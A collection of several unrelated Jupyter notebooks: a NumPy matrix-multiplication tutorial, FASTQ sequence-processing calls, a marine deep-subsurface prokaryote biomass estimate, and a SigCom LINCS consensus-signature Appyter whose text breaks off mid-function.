### Important Reminders About Matrix Multiplication
- The number of columns in the left matrix must equal the number of rows in the right matrix.
- The answer matrix always has the same number of rows as the left matrix and the same number of columns as the right matrix.
- Order matters. Multiplying A•B is not the same as multiplying B•A.
- Data in the left matrix should be arranged as rows., while data in the right matrix should be arranged as columns.
```
m = np.array([[1,2,3],[4,5,6]])
n = m * 0.25
np.multiply(m,n) # m * n
```
#### Matrix Product
```
# pay close attention to the shapes of the matrices
# the column of the left matrix must have the same value as the row of the right matrix
a = np.array([[1,2,3,4],[5,6,7,8]])
print(a.shape)
b = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]])
print(b.shape)
c = np.matmul(a,b)
print(c)
```
#### Dot Product
It turns out that the results of `dot` and `matmul` are the same if the matrices are two dimensional. However, if the dimensions differ then you should expect different results so it's best to check the documentation for [dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) and [matmul](https://docs.scipy.org/doc/numpy/reference/generated/numpy.matmul.html#numpy.matmul).
```
a = np.array([[1,2],[3,4]])
# two ways of calling dot product
np.dot(a,a)
a.dot(a)
np.matmul(a,a)
```
### Matrix Transpose
If the original matrix is not a square then transpose changes its shape, technically we are swapping
e.g. 2x4 matrix to 4x2
#### Rule of thumb: you can transpose for matrix multiplication if the data in the original matrices was arranged in rows but doesn't always apply
Stop and really think what is in your matrices and which should interact with each other
```
m = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(m)
print(m.shape)
```
NumPy does this without actually moving any data in memory -
it simply changes the way it indexes the original matrix - so it’s quite efficient.
```
# let's do a transpose
m.T
# be careful with modifying data
m_t = m.T
m_t[3][1] = 200
m_t
```
Notice how it modified both the transpose and the original matrix, too!
```
m
```
#### Real case example
```
# we have two matrices inputs and weights (essential concepts for Neural Networks)
inputs = np.array([[-0.27, 0.45, 0.64, 0.31]])
print(inputs)
inputs.shape
weights = np.array([[0.02, 0.001, -0.03, 0.036], \
[0.04, -0.003, 0.025, 0.009], [0.012, -0.045, 0.28, -0.067]])
print(weights)
weights.shape
# let's try to do a matrix multiplication
np.matmul(inputs, weights)
```
What happened was that our matrices were not compatible because the columns from our left matrix didn't equal the number of rows from the right matrix. So what do we do? We transpose but which one? That depends on what shape we want.
```
np.matmul(inputs, weights.T)
# in order for this to work we have to swap the order of our matrices
np.matmul(weights, inputs.T)
```
The two answers are transposes of each other, so which multiplication you use really just depends on the shape you want for the output.
### Numpy exercises
```
def prepare_inputs(inputs):
# TODO: create a 2-dimensional ndarray from the given 1-dimensional list;
# assign it to input_array
input_array = np.array([inputs])
# TODO: find the minimum value in input_array and subtract that
# value from all the elements of input_array. Store the
# result in inputs_minus_min
inputs_minus_min = input_array - input_array.min()
# TODO: find the maximum value in inputs_minus_min and divide
# all of the values in inputs_minus_min by the maximum value.
# Store the results in inputs_div_max.
inputs_div_max = inputs_minus_min / inputs_minus_min.max()
# return the three arrays we've created
return input_array, inputs_minus_min, inputs_div_max
def multiply_inputs(m1, m2):
# TODO: Check the shapes of the matrices m1 and m2.
# m1 and m2 will be ndarray objects.
#
# Return False if the shapes cannot be used for matrix
# multiplication. You may not use a transpose
if m1.shape[0] != m2.shape[1] and m1.shape[1] != m2.shape[0]:
return False
# TODO: If you have not returned False, then calculate the matrix product
# of m1 and m2 and return it. Do not use a transpose,
# but you swap their order if necessary
if m1.shape[1] == m2.shape[0]:
return np.matmul(m1, m2)
else:
return np.matmul(m2, m1)
def find_mean(values):
# TODO: Return the average of the values in the given Python list
return np.mean(values)
input_array, inputs_minus_min, inputs_div_max = prepare_inputs([-1,2,7])
print("Input as Array: {}".format(input_array))
print("Input minus min: {}".format(inputs_minus_min))
print("Input Array: {}".format(inputs_div_max))
print("Multiply 1:\n{}".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1],[2],[3],[4]]))))
print("Multiply 2:\n{}".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1],[2],[3]]))))
print("Multiply 3:\n{}".format(multiply_inputs(np.array([[1,2,3],[4,5,6]]), np.array([[1,2]]))))
print("Mean == {}".format(find_mean([1,3,4])))
```
|
github_jupyter
|
```
%load_ext autoreload
%autoreload 2
import datetime
import os
print(datetime.datetime.now())
from pygentoolbox import SplitFastqFileBySeqLength
# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved
# from pygentoolbox.Tools import make_circos_karyotype_file
#dir(pygentoolbox.Tools)
%matplotlib inline
import matplotlib.pyplot as plt
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE.fastq'
SplitFastqFileBySeqLength.main(f)
%load_ext autoreload
%autoreload 2
import datetime
import os
print(datetime.datetime.now())
from pygentoolbox import FindScanRNAInFastq
# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved
# from pygentoolbox.Tools import make_circos_karyotype_file
#dir(pygentoolbox.Tools)
%matplotlib inline
import matplotlib.pyplot as plt
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES25bp.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'
# currently script assumes UNG signature is at the 5' end of the read
FindScanRNAInFastq.main(f)
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.RNAReadsConnectedDNAOver300winExtIES150bp.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'
# currently script assumes UNG signature is at the 5' end of the read
FindScanRNAInFastq.main(f)
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F260.sort.IESOnly26bp.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'
# currently script assumes UNG signature is at the 5' end of the read
FindScanRNAInFastq.main(f)
%load_ext autoreload
%autoreload 2
import datetime
import os
print(datetime.datetime.now())
from pygentoolbox import SplitFastqFileBySeqLength
# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved
# from pygentoolbox.Tools import make_circos_karyotype_file
#dir(pygentoolbox.Tools)
%matplotlib inline
import matplotlib.pyplot as plt
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE.fastq'
SplitFastqFileBySeqLength.main(f)
%load_ext autoreload
%autoreload 2
import datetime
import os
print(datetime.datetime.now())
from pygentoolbox import FindScanRNAInFastq
# from pygentoolbox.Tools import read_interleaved_fasta_as_noninterleaved
# from pygentoolbox.Tools import make_circos_karyotype_file
#dir(pygentoolbox.Tools)
%matplotlib inline
import matplotlib.pyplot as plt
# f is full path to fastq file
f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\hisat2\\Pt_51_MacAndIES\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.F4.sort.IESOnly25bp.fastq'
#f = 'D:\\LinuxShare\\Projects\\Lyna\\CharSeqPipe\\EV_E_50MilReads\\pear\\WT_E_L1_R1R2.trim.Ass50Million.DNA20RNA20.rna.bridgePE25bp.fastq'
# currently script assumes UNG signature is at the 5' end of the read
FindScanRNAInFastq.main(f)
```
|
github_jupyter
|
```
#Load dependencies
import numpy as np
import pandas as pd
pd.options.display.float_format = '{:,.1e}'.format
import sys
sys.path.insert(0, '../../statistics_helper')
from CI_helper import *
from excel_utils import *
```
# Estimating the total biomass of marine deep subsurface archaea and bacteria
We use our best estimates for the total number of marine deep subsurface prokaryotes, the carbon content of marine deep subsurface prokaryotes and the fraction of archaea and bacteria out of the total population of marine deep subsurface prokaryotes to estimate the total biomass of marine deep subsurface bacteria and archaea.
```
results = pd.read_excel('marine_deep_subsurface_prok_biomass_estimate.xlsx')
results
```
We multiply all the relevant parameters to arrive at our best estimate for the biomass of marine deep subsurface archaea and bacteria, and propagate the uncertainties associated with each parameter to calculate the uncertainty associated with the estimate for the total biomass.
```
# Calculate the total biomass of marine archaea and bacteria
total_arch_biomass = results['Value'][0]*results['Value'][1]*1e-15*results['Value'][2]
total_bac_biomass = results['Value'][0]*results['Value'][1]*1e-15*results['Value'][3]
print('Our best estimate for the total biomass of marine deep subsurface archaea is %.0f Gt C' %(total_arch_biomass/1e15))
print('Our best estimate for the total biomass of marine deep subsurface bacteria is %.0f Gt C' %(total_bac_biomass/1e15))
# Propagate the uncertainty associated with each parameter to the final estimate
arch_biomass_uncertainty = CI_prod_prop(results['Uncertainty'][:3])
bac_biomass_uncertainty = CI_prod_prop(results.iloc[[0,1,3]]['Uncertainty'])
print('The uncertainty associated with the estimate for the biomass of archaea is %.1f-fold' %arch_biomass_uncertainty)
print('The uncertainty associated with the estimate for the biomass of bacteria is %.1f-fold' %bac_biomass_uncertainty)
# Feed bacteria results to Table 1 & Fig. 1
update_results(sheet='Table1 & Fig1',
row=('Bacteria','Marine deep subsurface'),
col=['Biomass [Gt C]', 'Uncertainty'],
values=[total_bac_biomass/1e15,bac_biomass_uncertainty],
path='../../results.xlsx')
# Feed archaea results to Table 1 & Fig. 1
update_results(sheet='Table1 & Fig1',
row=('Archaea','Marine deep subsurface'),
col=['Biomass [Gt C]', 'Uncertainty'],
values=[total_arch_biomass/1e15,arch_biomass_uncertainty],
path='../../results.xlsx')
# Feed bacteria results to Table S1
update_results(sheet='Table S1',
row=('Bacteria','Marine deep subsurface'),
col=['Number of individuals'],
values= results['Value'][0]*results['Value'][3],
path='../../results.xlsx')
# Feed archaea results to Table S1
update_results(sheet='Table S1',
row=('Archaea','Marine deep subsurface'),
col=['Number of individuals'],
values= results['Value'][0]*results['Value'][2],
path='../../results.xlsx')
```
|
github_jupyter
|
```
#%%appyter init
from appyter import magic
magic.init(lambda _=globals: _())
%%appyter hide_code
{% do SectionField(
name='PRIMARY',
title='1. Upload your data',
subtitle='Upload up and down gene-sets to perform two-sided rank enrichment. '+
'Upload up- or down-only gene-sets to perform rank analysis for that direction.',
img='file-upload.png'
) %}
{% do SectionField(
name='ENRICHMENT',
title='2. Choose libraries for enrichment',
subtitle='Select the libraries that would be used for consensus analysis, as well as the Enrichr and '+
'Drugmonizome libraries to use for enriching the consensus perturbagens.',
img='find-replace.png'
) %}
{% do SectionField(
name='PARAMETER',
title='3. Tweak the parameters',
subtitle='Modify the parameters to suit the needs of your analysis.',
img='hammer-screwdriver.png'
) %}
%%appyter markdown
{% set title = StringField(
name='title',
label='Notebook Name',
default='SigCom LINCS Consensus Signatures',
section="PRIMARY",
) %}
# {{ title.raw_value }}
```
The SigCom LINCS hosts ranked L1000 [1] perturbation signatures from a variety of perturbation types including: drugs and other small molecules, CRISPR knockouts, shRNA knockdowns, and single gene overexpression. SigCom LINCS' RESTful APIs enable querying the signatures programmatically to identify mimickers or reversers for input up and down gene sets. This appyter extends this functionality by enabling analysis for a collection of input signatures to identify consistently reoccuring mimickers and reversers. The appyter takes as input a set of two-sided or one-sided gene sets and constructs a score matrix of mimicking and reversing signatures. From this matrix the appyter computes the consensus. The pipeline also includes (1) Clustergrammer [2] interactive heatmap, and (2) enrichment analysis of the top gene perturbations [3-6] to elucidate the pathways that are being targeted by the consensus perturbagens.
```
import re
import math
import time
import requests
import pandas as pd
import json
import scipy.stats as st
from IPython.display import display, IFrame, Markdown, HTML
import seaborn as sns
import matplotlib.pyplot as plt
from umap import UMAP
from sklearn.manifold import TSNE
from maayanlab_bioinformatics.normalization import quantile_normalize, zscore_normalize
from maayanlab_bioinformatics.harmonization import ncbi_genes_lookup
from tqdm import tqdm
import plotly.express as px
import numpy as np
from matplotlib.ticker import MaxNLocator
METADATA_API = "https://maayanlab.cloud/sigcom-lincs/metadata-api"
DATA_API = "https://maayanlab.cloud/sigcom-lincs/data-api/api/v1"
CLUSTERGRAMMER_URL = 'https://maayanlab.cloud/clustergrammer/matrix_upload/'
S3_PREFIX = "https://appyters.maayanlab.cloud/storage/LDP3Consensus/"
drugmonizome_meta_api = "https://maayanlab.cloud/drugmonizome/metadata-api"
drugmonizome_data_api = "https://maayanlab.cloud/drugmonizome/data-api/api/v1"
enrichr_api = 'https://maayanlab.cloud/Enrichr/'
table = 1
figure = 1
%%appyter code_exec
{% set up_gene_sets = FileField(
name='up_gene_sets',
label='Up Gene-sets',
default='covid19_up.gmt',
section="PRIMARY",
examples={
'covid19_up.gmt': 'https://appyters.maayanlab.cloud/storage/LDP3Consensus/covid19_up.gmt'
}
) %}
{% set down_gene_sets = FileField(
name='down_gene_sets',
label='Down Gene-sets',
default='covid19_down.gmt',
section="PRIMARY",
examples={
'covid19_down.gmt': 'https://appyters.maayanlab.cloud/storage/LDP3Consensus/covid19_down.gmt'
}
) %}
up_gene_sets = {{ up_gene_sets }}
down_gene_sets = {{ down_gene_sets }}
gene_set_direction = None
if up_gene_sets == '':
gene_set_direction = "down"
print("Up gene-sets was not uploaded. Gene-set direction is set to down.")
elif down_gene_sets == '':
gene_set_direction = "up"
print("Down gene-sets was not uploaded. Gene-set direction is set to up.")
%%appyter code_exec
datasets = {{ MultiChoiceField(name='datasets',
label='LINCS Datasets',
description='Select the LINCS datasets to use for the consensus analysis',
default=[
"LINCS L1000 CRISPR Perturbations (2021)",
"LINCS L1000 Chemical Perturbations (2021)",
],
section = 'ENRICHMENT',
choices=[
"LINCS L1000 Antibody Perturbations (2021)",
"LINCS L1000 Ligand Perturbations (2021)",
"LINCS L1000 Overexpression Perturbations (2021)",
"LINCS L1000 CRISPR Perturbations (2021)",
"LINCS L1000 shRNA Perturbations (2021)",
"LINCS L1000 Chemical Perturbations (2021)",
"LINCS L1000 siRNA Perturbations (2021)",
]
)
}}
drugmonizome_datasets = {{ MultiChoiceField(name='drugmonizome_datasets',
description='Select the Drugmonizome libraries to use for the enrichment analysis of the consensus drugs',
label='Drugmonizome Libraries',
default=["L1000FWD_GO_Biological_Processes_drugsetlibrary_up", "L1000FWD_GO_Biological_Processes_drugsetlibrary_down"],
section = 'ENRICHMENT',
choices=[
"L1000FWD_GO_Biological_Processes_drugsetlibrary_up",
"L1000FWD_GO_Biological_Processes_drugsetlibrary_down",
"L1000FWD_GO_Cellular_Component_drugsetlibrary_up",
"L1000FWD_GO_Cellular_Component_drugsetlibrary_down",
"L1000FWD_GO_Molecular_Function_drugsetlibrary_up",
"L1000FWD_GO_Molecular_Function_drugsetlibrary_down",
"L1000FWD_KEGG_Pathways_drugsetlibrary_up",
"L1000FWD_KEGG_Pathways_drugsetlibrary_down",
"L1000FWD_signature_drugsetlibrary_up",
"L1000FWD_signature_drugsetlibrary_down",
"L1000FWD_predicted_side_effects",
"KinomeScan_kinase_drugsetlibrary",
"Geneshot_associated_drugsetlibrary",
"Geneshot_predicted_generif_drugsetlibrary",
"Geneshot_predicted_coexpression_drugsetlibrary",
"Geneshot_predicted_tagger_drugsetlibrary",
"Geneshot_predicted_autorif_drugsetlibrary",
"Geneshot_predicted_enrichr_drugsetlibrary",
"SIDER_indications_drugsetlibrary",
"SIDER_side_effects_drugsetlibrary",
"DrugRepurposingHub_target_drugsetlibrary",
"ATC_drugsetlibrary",
"Drugbank_smallmolecule_target_drugsetlibrary",
"Drugbank_smallmolecule_enzyme_drugsetlibrary",
"Drugbank_smallmolecule_carrier_drugsetlibrary",
"Drugbank_smallmolecule_transporter_drugsetlibrary",
"STITCH_target_drugsetlibrary",
"PharmGKB_OFFSIDES_side_effects_drugsetlibrary",
"CREEDS_signature_drugsetlibrary_down",
"CREEDS_signature_drugsetlibrary_up",
"RDKIT_maccs_fingerprints_drugsetlibrary",
"DrugCentral_target_drugsetlibrary",
"PubChem_fingerprints_drugsetlibrary",
"DrugRepurposingHub_moa_drugsetlibrary",
"PharmGKB_snp_drugsetlibrary"
]
)
}}
transcription_libraries = {{ MultiChoiceField(name='transcription_libraries',
description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',
label='Enrichr Transcription Libraries',
default=[],
section = 'ENRICHMENT',
choices=[
'ARCHS4_TFs_Coexp',
'ChEA_2016',
'ENCODE_and_ChEA_Consensus_TFs_from_ChIP-X',
'ENCODE_Histone_Modifications_2015',
'ENCODE_TF_ChIP-seq_2015',
'Epigenomics_Roadmap_HM_ChIP-seq',
'Enrichr_Submissions_TF-Gene_Coocurrence',
'Genome_Browser_PWMs',
'lncHUB_lncRNA_Co-Expression',
'miRTarBase_2017',
'TargetScan_microRNA_2017',
'TF-LOF_Expression_from_GEO',
'TF_Perturbations_Followed_by_Expression',
'Transcription_Factor_PPIs',
'TRANSFAC_and_JASPAR_PWMs',
'TRRUST_Transcription_Factors_2019'])
}}
pathways_libraries = {{ MultiChoiceField(name='pathways_libraries',
description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',
label='Enrichr Pathway Libraries',
default=[],
section = 'ENRICHMENT',
choices=[
'ARCHS4_Kinases_Coexp',
'BioCarta_2016',
'BioPlanet_2019',
'BioPlex_2017',
'CORUM',
'Elsevier_Pathway_Collection',
'HMS_LINCS_KinomeScan',
'HumanCyc_2016',
'huMAP',
'KEA_2015',
'KEGG_2021_Human',
'KEGG_2019_Mouse',
'Kinase_Perturbations_from_GEO_down',
'Kinase_Perturbations_from_GEO_up',
'L1000_Kinase_and_GPCR_Perturbations_down',
'L1000_Kinase_and_GPCR_Perturbations_up',
'NCI-Nature_2016',
'NURSA_Human_Endogenous_Complexome',
'Panther_2016',
'Phosphatase_Substrates_from_DEPOD',
'PPI_Hub_Proteins',
'Reactome_2016',
'SILAC_Phosphoproteomics',
'SubCell_BarCode',
'Virus-Host_PPI_P-HIPSTer_2020',
'WikiPathway_2021_Human',
'WikiPathways_2019_Mouse'])
}}
ontologies_libraries = {{ MultiChoiceField(name='ontologies_libraries',
description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',
label='Enrichr Ontology Libraries',
default=['GO_Biological_Process_2021'],
section = 'ENRICHMENT',
choices=[
'GO_Biological_Process_2021',
'GO_Cellular_Component_2021',
'GO_Molecular_Function_2021',
'Human_Phenotype_Ontology',
'Jensen_COMPARTMENTS',
'Jensen_DISEASES',
'Jensen_TISSUES',
'MGI_Mammalian_Phenotype_Level_4_2021'])
}}
diseases_drugs_libraries = {{ MultiChoiceField(name='diseases_drugs_libraries',
description='Select the Enrichr libraries to use for the enrichment of the consensus genes.',
label='Enrichr Disease/Drug Libraries',
default=[],
section = 'ENRICHMENT',
choices=[
'Achilles_fitness_decrease',
'Achilles_fitness_increase',
'ARCHS4_IDG_Coexp',
'ClinVar_2019',
'dbGaP',
'DepMap_WG_CRISPR_Screens_Broad_CellLines_2019',
'DepMap_WG_CRISPR_Screens_Sanger_CellLines_2019',
'DisGeNET',
'DrugMatrix',
'DSigDB',
'GeneSigDB',
'GWAS_Catalog_2019',
'LINCS_L1000_Chem_Pert_down',
'LINCS_L1000_Chem_Pert_up',
'LINCS_L1000_Ligand_Perturbations_down',
'LINCS_L1000_Ligand_Perturbations_up',
'MSigDB_Computational',
'MSigDB_Oncogenic_Signatures',
'Old_CMAP_down',
'Old_CMAP_up',
'OMIM_Disease',
'OMIM_Expanded',
'PheWeb_2019',
'Rare_Diseases_AutoRIF_ARCHS4_Predictions',
'Rare_Diseases_AutoRIF_Gene_Lists',
'Rare_Diseases_GeneRIF_ARCHS4_Predictions',
'Rare_Diseases_GeneRIF_Gene_Lists',
'UK_Biobank_GWAS_v1',
'Virus_Perturbations_from_GEO_down',
'Virus_Perturbations_from_GEO_up',
'VirusMINT'])
}}
%%appyter code_exec
alpha = {{FloatField(name='alpha', label='p-value cutoff', default=0.05, section='PARAMETER')}}
min_sigs = {{IntField(name='min_sigs',
label='min_sigs',
description='Minimum number of input gene sets that has the same hit required to consider it as a consensus signature',
default=2, section='PARAMETER')}}
top_perts = {{IntField(name='top_perts', label='top signatures', default=100, section='PARAMETER')}}
consensus_method = {{ ChoiceField(
name='consensus_method',
label='consensus method',
description='Please select a method for getting the consensus',
default='z-score',
choices={
'z-score': "'z-score'",
'top count': "'count'",
},
section='PARAMETER') }}
```
## Gene Harmonization
To ensure that the gene names are consistent throughout the analysis, the input gene sets are harmonized to NCBI Gene symbols [7-8] using an [in-house gene harmonization module](https://github.com/MaayanLab/maayanlab-bioinformatics).
```
ncbi_lookup = ncbi_genes_lookup('Mammalia/Homo_sapiens')
print('Loaded NCBI genes!')
signatures = {}
if not up_gene_sets == '':
with open(up_gene_sets) as upfile:
for line in upfile:
unpacked = line.strip().split("\t")
if len(unpacked) < 3:
raise ValueError("GMT is not formatted properly, please consult the README of the appyter for proper formatting")
sigid = unpacked[0]
geneset = unpacked[2:]
genes = []
for i in geneset:
gene = i.split(",")[0]
gene_name = ncbi_lookup(gene.upper())
if gene_name:
genes.append(gene_name)
signatures[sigid] = {
"up_genes": genes,
"down_genes": []
}
if not down_gene_sets == '':
with open(down_gene_sets) as downfile:
for line in downfile:
unpacked = line.strip().split("\t")
if len(unpacked) < 3:
raise ValueError("GMT is not formatted properly, please consult the README of the appyter for proper formatting")
sigid = unpacked[0]
geneset = unpacked[2:]
if sigid not in signatures and gene_set_direction == None:
raise ValueError("%s did not match any of the up signatures, make sure that the signature names are the same for both up and down genes"%sigid)
else:
genes = []
for i in geneset:
gene = i.split(",")[0]
gene_name = ncbi_lookup(gene)
if gene_name:
genes.append(gene_name)
if sigid in signatures:
signatures[sigid]["down_genes"] = genes
else:
signatures[sigid] = {
"up_genes": [],
"down_genes": genes
}
```
## Input Signatures Metadata
```
enrichr_libraries = transcription_libraries + pathways_libraries + ontologies_libraries + diseases_drugs_libraries
dataset_map = {
"LINCS L1000 Antibody Perturbations (2021)": "l1000_aby",
"LINCS L1000 Ligand Perturbations (2021)": "l1000_lig",
"LINCS L1000 Overexpression Perturbations (2021)": "l1000_oe",
"LINCS L1000 CRISPR Perturbations (2021)": "l1000_xpr",
"LINCS L1000 shRNA Perturbations (2021)": "l1000_shRNA",
"LINCS L1000 Chemical Perturbations (2021)": "l1000_cp",
"LINCS L1000 siRNA Perturbations (2021)": "l1000_siRNA"
}
labeller = {
"LINCS L1000 Antibody Perturbations (2021)": "antibody",
"LINCS L1000 Ligand Perturbations (2021)": "ligand",
"LINCS L1000 Overexpression Perturbations (2021)": "overexpression",
"LINCS L1000 CRISPR Perturbations (2021)": "CRISPR",
"LINCS L1000 shRNA Perturbations (2021)": "shRNA",
"LINCS L1000 Chemical Perturbations (2021)": "chemical",
"LINCS L1000 siRNA Perturbations (2021)": "siRNA"
}
gene_page = {
"LINCS L1000 Ligand Perturbations (2021)",
"LINCS L1000 Overexpression Perturbations (2021)",
"LINCS L1000 CRISPR Perturbations (2021)",
"LINCS L1000 shRNA Perturbations (2021)",
"LINCS L1000 siRNA Perturbations (2021)"
}
drug_page = {
"LINCS L1000 Chemical Perturbations (2021)": "l1000_cp",
}
```
## SigCom LINCS Signature Search
SigCom LINCS provides RESTful APIs to perform rank enrichment analysis on two-sided (up and down) gene-sets or one-sided (up-only, down-only) gene sets to get mimicking and reversing signatures that are ranked by z-score (one-sided gene-sets) or z-sum (absolute value sum of the z-scores of the up and down gene-sets for two-sided analysis).
```
# functions
def convert_genes(up_genes=[], down_genes=[]):
try:
payload = {
"filter": {
"where": {
"meta.symbol": {"inq": up_genes + down_genes}
}
}
}
timeout = 0.5
for i in range(5):
res = requests.post(METADATA_API + "/entities/find", json=payload)
if res.ok:
break
else:
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
raise Exception(res.text)
results = res.json()
up = set(up_genes)
down = set(down_genes)
if len(up_genes) == 0 or len(down_genes) == 0:
converted = {
"entities": [],
}
else:
converted = {
"up_entities": [],
"down_entities": []
}
for i in results:
symbol = i["meta"]["symbol"]
if "entities" in converted:
converted["entities"].append(i["id"])
elif symbol in up:
converted["up_entities"].append(i["id"])
elif symbol in down:
converted["down_entities"].append(i["id"])
return converted
except Exception as e:
print(e)
def signature_search(genes, library):
try:
payload = {
**genes,
"database": library,
"limit": 500,
}
timeout = 0.5
for i in range(5):
endpoint = "/enrich/rank" if "entities" in payload else "/enrich/ranktwosided"
res = requests.post(DATA_API + endpoint, json=payload)
if res.ok:
break
else:
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
raise Exception(res.text)
return res.json()["results"]
except Exception as e:
print(e)
def resolve_rank(s, gene_set_direction):
try:
sigs = {}
for i in s:
if i["p-value"] < alpha:
uid = i["uuid"]
direction = "up" if i["zscore"] > 0 else "down"
if direction == gene_set_direction:
i["type"] = "mimicker"
sigs[uid] = i
else:
i["type"] = "reverser"
sigs[uid] = i
payload = {
"filter": {
"where": {
"id": {"inq": list(sigs.keys())}
},
"fields": [
"id",
"meta.pert_name",
"meta.pert_type",
"meta.pert_time",
"meta.pert_dose",
"meta.cell_line",
"meta.local_id"
]
}
}
timeout = 0.5
for i in range(5):
res = requests.post(METADATA_API + "/signatures/find", json=payload)
if res.ok:
break
else:
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
raise Exception(res.text)
results = res.json()
signatures = {
"mimickers": {},
"reversers": {}
}
for sig in results:
uid = sig["id"]
scores = sigs[uid]
sig["scores"] = scores
if "pert_name" in sig["meta"]:
local_id = sig["meta"].get("local_id", None)
if scores["type"] == "mimicker":
pert_name = sig["meta"].get("pert_name", None)
local_id = "%s_%s"%(pert_name, local_id.replace("_%s"%pert_name, ""))
signatures["mimickers"][local_id] = {
"pert_name": sig["meta"].get("pert_name", None),
"pert_time": sig["meta"].get("pert_time", None),
"pert_dose": sig["meta"].get("pert_dose", None),
"cell_line": sig["meta"].get("cell_line", None),
"z-score": abs(scores.get("zscore", 0)),
"p-value": scores.get("p-value", 0)
}
elif scores["type"] == "reverser":
pert_name = sig["meta"].get("pert_name", None)
local_id = "%s_%s"%(pert_name, local_id.replace("_%s"%pert_name, ""))
signatures["reversers"][local_id] = {
"pert_name": sig["meta"].get("pert_name", None),
"pert_time": sig["meta"].get("pert_time", None),
"pert_dose": sig["meta"].get("pert_dose", None),
"cell_line": sig["meta"].get("cell_line", None),
"z-score": abs(scores.get("zscore", 0)),
"p-value": scores.get("p-value", 0)
}
return signatures
except Exception as e:
print(e)
def resolve_ranktwosided(s):
try:
sigs = {}
for i in s:
if i['p-down'] < alpha and i['p-up'] < alpha:
uid = i["uuid"]
i['z-sum (abs)'] = abs(i['z-sum'])
if i['z-sum'] > 0:
i["type"] = "mimicker"
sigs[uid] = i
elif i['z-sum'] < 0:
i["type"] = "reverser"
sigs[uid] = i
payload = {
"filter": {
"where": {
"id": {"inq": list(sigs.keys())}
},
"fields": [
"id",
"meta.pert_name",
"meta.pert_type",
"meta.pert_time",
"meta.pert_dose",
"meta.cell_line",
"meta.local_id"
]
}
}
timeout = 0.5
for i in range(5):
res = requests.post(METADATA_API + "/signatures/find", json=payload)
if res.ok:
break
else:
time.sleep(timeout)
if res.status_code >= 500:
timeout = timeout * 2
else:
raise Exception(res.text)
results = res.json()
signatures = {
"mimickers": {},
"reversers": {}
}
for sig in results:
uid = sig["id"]
scores = sigs[uid]
sig["scores"] = scores
if "pert_name" in sig["meta"]:
local_id = sig["meta"].get("local_id", None)
if scores["type"] == "mimicker" and len(signatures["mimickers"]) < 100:
pert_name = sig["meta"].get("pert_name", None)
local_id = "%s_%s"%(pert_name, local_id.replace("_%s"%pert_name, ""))
signatures["mimickers"][local_id] = {
"pert_name": sig["meta"].get("pert_name", None),
"pert_time": sig["meta"].get("pert_time", None),
"pert_dose": sig["meta"].get("pert_dose", None),
"cell_line": sig["meta"].get("cell_line", None),
"z-sum": scores.get("z-sum (abs)", 0)
}
elif scores["type"] == "reverser" and len(signatures["reversers"]) < 100:
pert_name = sig["meta"].get("pert_name", None)
local_id = "%s_%s"%(pert_name, local_id.replace("_%s"%pert_name, ""))
signatures["reversers"][local_id] = {
"pert_name": sig["meta"].get("pert_name", None),
"pert_time": sig["meta"].get("pert_time", None),
"pert_dose": sig["meta"].get("pert_dose", None),
"cell_line": sig["meta"].get("cell_line", None),
"z-sum": scores.get("z-sum (abs)", 0)
}
return signatures
except Exception as e:
